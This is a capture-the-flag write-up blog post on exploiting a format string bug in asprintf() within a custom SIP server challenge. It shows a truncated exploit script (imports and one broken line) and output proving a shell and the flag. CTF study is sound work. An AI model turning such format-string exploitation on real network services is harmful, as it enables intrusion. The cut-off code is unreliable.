Joel Eriksson
Vulnerability researcher, exploit developer and reverse-engineer. Have spoken at BlackHat, DefCon and the RSA conference. CTF player. Puzzle solver (Cicada 3301, Boxen)

Ghost in The Shellcode 2015 Teaser: Citadel solution

This is my exploit for the Citadel challenge in the Ghost in The Shellcode 2015 Teaser CTF. I have attached my IDB as well, so those of you with IDA Pro can see what the reversing-part of the process looked like.

The Citadel challenge consisted of a custom SIP server (Linux/x86_64), with NX, ASLR and partial RELRO enabled. After some time reverse-engineering the binary, I discovered a format string vulnerability in a call to asprintf(). However, to actually get data under our control on the stack, in order to use the format string vulnerability effectively, I had to do some further digging…

My final exploit code:

# Exploit for the Citadel challenge from the Ghost in the Shellcode 2015 Teaser CTF.
# Joel Eriksson  2014

import telnetlib
import struct
import socket
import sys

u64 = lambda x: struct.pack("

Below you can see the output of the exploit. :)

je@tiny:~$ ./
uid=1000(citadel) gid=1000(citadel) groups=1000(citadel)
Linux ip-10-101-192-40 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
key{Should have used boost::format}

The vulnerable binary:

My IDB for the binary: